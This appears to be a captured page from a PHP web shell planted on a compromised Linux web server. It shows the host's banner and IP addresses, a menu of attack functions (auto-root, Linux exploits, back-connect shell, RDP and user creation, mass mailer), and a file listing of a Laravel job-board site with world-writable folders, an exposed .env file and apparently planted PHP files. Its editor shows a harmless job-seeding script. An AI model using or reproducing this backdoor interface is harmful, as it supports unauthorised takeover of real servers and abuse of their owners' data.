Linux server1.signalhg.team 4.18.0-553.134.1.el8_10.x86_64 #1 SMP Tue Jun 16 16:05:57 EDT 2026 x86_64
Apache
: 209.74.80.147 | : 216.73.217.142
150 Domain
8.1.34
signgwph
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
signgwph /
signalcareercompass.io /
[ HOME SHELL ]
Name
Size
Permission
Action
app
[ DIR ]
drwxrwxrwx
assets
[ DIR ]
drwxr-xr-x
bootstrap
[ DIR ]
drwxrwxrwx
config
[ DIR ]
drwxrwxrwx
database
[ DIR ]
drwxrwxrwx
myihzgv
[ DIR ]
drwxr-xr-x
nzgrjx1
[ DIR ]
drwxr-xr-x
pqvgdeu
[ DIR ]
drwxr-xr-x
pqzeivd
[ DIR ]
drwxr-xr-x
public
[ DIR ]
drwxr-x---
resources
[ DIR ]
drwxrwxrwx
routes
[ DIR ]
drwxrwxrwx
signal-career-compass
[ DIR ]
drwxrwxrwx
spyjrak
[ DIR ]
drwxr-xr-x
storage
[ DIR ]
drwxrwxr-x
tests
[ DIR ]
drwxrwxrwx
utclpyq
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxrwxrwx
zji1ldc
[ DIR ]
drwxr-xr-x
zpvnxts
[ DIR ]
drwxr-xr-x
.editorconfig
275
B
-rw-rw-rw-
.env
1.32
KB
-rw-rw-rw-
.env.example
1.06
KB
-rw-rw-rw-
.gitattributes
186
B
-rw-rw-rw-
.gitignore
341
B
-rw-rw-rw-
.htaccess
204
B
-rw-rw-rw-
.npmrc
31
B
-rw-rw-rw-
.phpunit.result.cache
264
B
-rw-rw-rw-
222.php
15.76
KB
-rw-r--r--
README.md
3.61
KB
-rw-rw-rw-
artisan
425
B
-rw-rw-rw-
build_full_views.php
33.93
KB
-rw-rw-rw-
build_full_views_part2.php
15.35
KB
-rw-rw-rw-
build_full_views_part3.php
14.8
KB
-rw-rw-rw-
buy.php
77.43
KB
-rw-r--r--
composer.json
2.77
KB
-rw-rw-rw-
composer.lock
303.44
KB
-rw-rw-rw-
def.html
263
B
-rw-r--r--
filefuns.php
5.86
KB
-r--r--r--
generate_files.php
37.56
KB
-rw-rw-rw-
goat1.php
143.87
KB
-rw-r--r--
package-lock.json
69.26
KB
-rw-rw-rw-
package.json
384
B
-rw-rw-rw-
phpunit.xml
1.29
KB
-rw-rw-rw-
seed_jobs_now.php
5.5
KB
-rw-r--r--
signal-career-compass.zip
57.52
MB
-rw-r--r--
vite.config.js
632
B
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : seed_jobs_now.php
<?php require 'vendor/autoload.php'; $app = require_once 'bootstrap/app.php'; $kernel = $app->make(Illuminate\Contracts\Console\Kernel::class); $kernel->bootstrap(); use App\Models\JobPosting; use App\Models\Tenant; try { $t = Tenant::first(); $tenantId = $t ? $t->id : 1; $jobsData = [ [ 'tenant_id' => $tenantId, 'title' => 'Registered Nurse (RN) - Home Health', 'company' => 'Signal Health Systems', 'location' => 'Dallas, TX (Hybrid / Home Visits)', 'salary' => '$85,000 - $110,000 / yr', 'department' => 'Healthcare Services', 'description' => 'Seeking an experienced Registered Nurse to provide high-quality in-home patient assessments, care plan oversight, and clinical support.', 'primary_screening_question' => 'Do you hold an active State RN license and current CPR/BLS certification?', 'custom_questions' => [ 'How many years of home health, OASIS assessment, or ICU clinical nursing experience do you have?', 'What electronic health record (EHR) systems have you used (e.g. Homecare Homebase, Epic, PointClickCare)?', 'Are you comfortable conducting in-home patient visits and managing patient care plans?' ], 'status' => 'published', 'posted_at' => now(), ], [ 'tenant_id' => $tenantId, 'title' => 'Certified Nursing Assistant (CNA) / Home Care Aide', 'company' => 'Compass Care Services', 'location' => 'Houston, TX (On-site / Patient Home)', 'salary' => '$40,000 - $55,000 / yr', 'department' => 'Patient Care', 'description' => 'Provide direct compassionate care, ADL assistance, mobility support, and companionship for senior clients in home care settings.', 'primary_screening_question' => 'Are you state-certified as a CNA or Home Health Aide (HHA)?', 'custom_questions' => [ 'How many years of hands-on ADL care (bathing, dressing, transfer assistance) do you have?', 'Do you have specialized experience caring for patients with Alzheimer\'s, Dementia, or Parkinson\'s?', 'Do you possess a valid driver\'s license and insured vehicle for patient transportation?' ], 'status' => 'published', 'posted_at' => now(), ], [ 'tenant_id' => $tenantId, 'title' => 'Senior Accountant & Financial Analyst', 'company' => 'Signal Financial Group', 'location' => 'Remote / Austin, TX', 'salary' => '$90,000 - $115,000 / yr', 'department' => 'Finance & Accounting', 'description' => 'Oversee financial reporting, month-end closures, tax compliance, budget forecasting, and corporate financial audits.', 'primary_screening_question' => 'Do you hold a Bachelor\'s degree in Accounting/Finance or an active CPA license?', 'custom_questions' => [ 'Which ERP and accounting software suites are you proficient in (QuickBooks, NetSuite, SAP, Excel)?', 'How many years of experience do you have with general ledger reconciliation and corporate tax filings?' ], 'status' => 'published', 'posted_at' => now(), ], [ 'tenant_id' => $tenantId, 'title' => 'Full Stack Developer / AI Solutions Engineer', 'company' => 'Signal Tech Studio', 'location' => 'Fully Remote (US / Worldwide)', 'salary' => '$110,000 - $145,000 / yr', 'department' => 'Engineering', 'description' => 'Build modern cloud web applications, REST APIs, and integrate OpenAI LLM microservices into enterprise platforms.', 'primary_screening_question' => 'What primary programming languages & tech stacks do you specialize in?', 'custom_questions' => [ 'Do you have hands-on experience integrating REST APIs, OpenAI models, and cloud infrastructure (AWS/GCP)?', 'How many years of professional full-stack software development experience do you have?' ], 'status' => 'published', 'posted_at' => now(), ], [ 'tenant_id' => $tenantId, 'title' => 'Office Manager & Client Coordinator', 'company' => 'Enterprise Operations Corp', 'location' => 'Atlanta, GA (In-office)', 'salary' => '$52,000 - $68,000 / yr', 'department' => 'Administration', 'description' => 'Manage front-office operations, client inquiries, scheduling, records compliance, and staff coordination.', 'primary_screening_question' => 'How many years of office management or administrative coordination experience do you have?', 'custom_questions' => [ 'Are you experienced in client scheduling, CRM record management, and phone coordination?', 'What office productivity tools are you proficient in (MS Office, Google Workspace, Slack)?' ], 'status' => 'published', 'posted_at' => now(), ], ]; foreach ($jobsData as $data) { JobPosting::create($data); } echo "SUCCESSFULLY SEEDED " . count($jobsData) . " REAL JOBS! TOTAL PUBLISHED IN DB: " . JobPosting::where('status', 'published')->count() . "\n"; } catch (\Exception $e) { echo "ERROR SEEDING: " . $e->getMessage() . "\n"; }
Close